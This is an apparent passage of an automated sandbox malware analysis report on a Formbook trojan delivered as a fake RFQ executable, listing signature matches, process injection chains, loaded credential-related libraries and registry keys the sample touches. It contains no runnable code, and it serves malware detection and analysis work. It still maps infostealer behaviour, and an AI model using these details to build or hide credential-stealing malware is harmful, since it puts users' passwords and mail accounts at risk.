              Source: 0000000D.00000002.3647567861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000010.00000002.4103523467.0000000001500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000002.00000002.4103630939.0000000003A30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000003.00000002.4101142200.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000003.00000002.4104284280.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000005.00000002.4105348256.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: VT3g2PdlLRVpwBp[1].exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: xl9lsbb.exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, cT2WNlVPnBAMr77NOs.csSecurity API names: _0020.SetAccessControl
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, cT2WNlVPnBAMr77NOs.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, cT2WNlVPnBAMr77NOs.csSecurity API names: _0020.AddAccessRule
              Source: 11.2.xl9lsbb.exe.4774ff0.3.raw.unpack, FbDRsRoUK8rESGYi11.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 11.2.xl9lsbb.exe.4774ff0.3.raw.unpack, cT2WNlVPnBAMr77NOs.csSecurity API names: _0020.SetAccessControl
              Source: 11.2.xl9lsbb.exe.4774ff0.3.raw.unpack, cT2WNlVPnBAMr77NOs.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 11.2.xl9lsbb.exe.4774ff0.3.raw.unpack, cT2WNlVPnBAMr77NOs.csSecurity API names: _0020.AddAccessRule
              Source: 11.2.xl9lsbb.exe.d240000.7.raw.unpack, FbDRsRoUK8rESGYi11.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 11.2.xl9lsbb.exe.4834210.2.raw.unpack, FbDRsRoUK8rESGYi11.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 11.2.xl9lsbb.exe.4834210.2.raw.unpack, cT2WNlVPnBAMr77NOs.csSecurity API names: _0020.SetAccessControl
              Source: 11.2.xl9lsbb.exe.4834210.2.raw.unpack, cT2WNlVPnBAMr77NOs.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 11.2.xl9lsbb.exe.4834210.2.raw.unpack, cT2WNlVPnBAMr77NOs.csSecurity API names: _0020.AddAccessRule
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/9@16/10
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EDA2D5 GetLastError,FormatMessageW,0_2_00EDA2D5
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EC8713 AdjustTokenPrivileges,CloseHandle,0_2_00EC8713
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EC8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00EC8CC3
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EDB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00EDB59E
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EEF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00EEF121
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00EE86D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_00EE86D0
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeCode function: 0_2_00E74FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00E74FE9
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRHJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeMutant created: NULL
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeFile created: C:\Users\user\AppData\Local\Temp\autC7F3.tmpJump to behavior
              Source: RFQ - MK FMHS.RFQ.24.101.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: RMActivate_ssp.exe, 00000003.00000003.1924110044.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1923913670.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4101608329.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000003.3826521155.0000000000996000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000F.00000002.4101900693.0000000000996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: RFQ - MK FMHS.RFQ.24.101.exeReversingLabs: Detection: 36%
              Source: RFQ - MK FMHS.RFQ.24.101.exeVirustotal: Detection: 36%
              Source: unknownProcess created: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe "C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe"
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe"
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeProcess created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe"
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess created: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe "C:\Users\user\AppData\Local\Temp\xl9lsbb.exe"
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess created: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe "C:\Users\user\AppData\Local\Temp\xl9lsbb.exe"
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeProcess created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"
              Source: C:\Windows\SysWOW64\runonce.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe"Jump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeProcess created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess created: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe "C:\Users\user\AppData\Local\Temp\xl9lsbb.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeProcess created: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe "C:\Users\user\AppData\Local\Temp\xl9lsbb.exe"Jump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeProcess created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: winsqlite3.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: winsqlite3.dllJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\runonce.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Windows\SysWOW64\RMActivate_ssp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
              Source: RFQ - MK FMHS.RFQ.24.101.exeStatic file information: File size 1173504 > 1048576
              Source: RFQ - MK FMHS.RFQ.24.101.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: RFQ - MK FMHS.RFQ.24.101.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: RFQ - MK FMHS.RFQ.24.101.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: RFQ - MK FMHS.RFQ.24.101.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: RFQ - MK FMHS.RFQ.24.101.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: RFQ - MK FMHS.RFQ.24.101.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: RFQ - MK FMHS.RFQ.24.101.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: WeSe.pdb source: VT3g2PdlLRVpwBp[1].exe.3.dr, xl9lsbb.exe.3.dr
              Source: Binary string: WeSe.pdbSHA256F source: VT3g2PdlLRVpwBp[1].exe.3.dr, xl9lsbb.exe.3.dr
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000002.4101090653.000000000055E000.00000002.00000001.01000000.00000004.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4102484254.000000000055E000.00000002.00000001.01000000.00000004.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 0000000E.00000002.4101091867.000000000055E000.00000002.00000001.01000000.00000004.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000010.00000000.3711234727.000000000055E000.00000002.00000001.01000000.00000004.sdmp
              Source: Binary string: runonce.pdbGCTL source: xl9lsbb.exe, 0000000D.00000002.3647968012.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 0000000E.00000002.4102514343.00000000013A8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: rmactivate_ssp.pdb source: svchost.exe, 00000001.00000003.1717916965.0000000003501000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1715600420.000000000281A000.00000004.00000020.00020000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000002.4102474122.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000002.4110602768.0000000006950000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: RFQ - MK FMHS.RFQ.24.101.exe, 00000000.00000003.1639103440.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, RFQ - MK FMHS.RFQ.24.101.exe, 00000000.00000003.1639005571.0000000003D20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1749836614.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1641789169.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1749836614.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1643485880.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4105069211.0000000003B6E000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1749852012.000000000367B000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4105069211.00000000039D0000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1751433381.0000000003820000.00000004.00000020.00020000.00000000.sdmp, xl9lsbb.exe, 0000000D.00000002.3648250842.0000000001360000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 